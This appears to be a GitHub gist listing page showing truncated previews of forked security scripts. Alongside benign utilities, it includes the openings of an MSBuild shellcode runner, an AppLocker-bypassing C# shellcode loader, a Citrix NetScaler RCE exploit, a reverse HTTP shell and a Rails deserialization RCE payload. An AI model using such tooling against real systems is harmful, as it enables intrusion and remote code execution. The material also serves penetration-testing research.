LongCat pich4ya

@pich4ya
pich4ya / flutter_ios.js
Created June 18, 2021 06:28 — forked from AICDEV/flutter_ios.js
Frida trace Flutter Functions on iOS
/**
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
*/
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 18:45 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 23:57 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 23:54 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@pich4ya
pich4ya / netscaler_exploit.py
Created January 19, 2020 14:56 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / ChangePassword.java
Created February 24, 2019 07:47 — forked from zach-klippenstein/ChangePassword.java
The keystore password on Java keystore files is utterly pointless. You can reset it without knowing it, as shown by this code. Note that private keys are still secure, as far as I know. The JKS implementation is copyright Casey Marshall (rsdio@metastatic.org), and the original source is available at http://metastatic.org/source/JKS.java. I've in…
import java.util.*;
import java.io.*;
import java.security.*;
public class ChangePassword
{
private final static JKS j = new JKS();
public static void main(String[] args) throws Exception
{
@pich4ya
pich4ya / hashcat_macos.sh
Last active February 4, 2022 00:34 — forked from chadmayfield/hashcat_macos.sh
Install Hashcat on macOS
#!/bin/bash
git clone https://github.com/hashcat/hashcat.git
mkdir -p hashcat/deps
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/ && make && make install
./hashcat --version
./hashcat -b -D 1,2
./example0.sh
@pich4ya
pich4ya / JSRat.ps1
Created July 4, 2018 18:01 — forked from nbosa/JSRat.ps1
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
@pich4ya
pich4ya / railspwn.rb
Last active November 29, 2018 06:25 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload, full credit to: https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
# https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end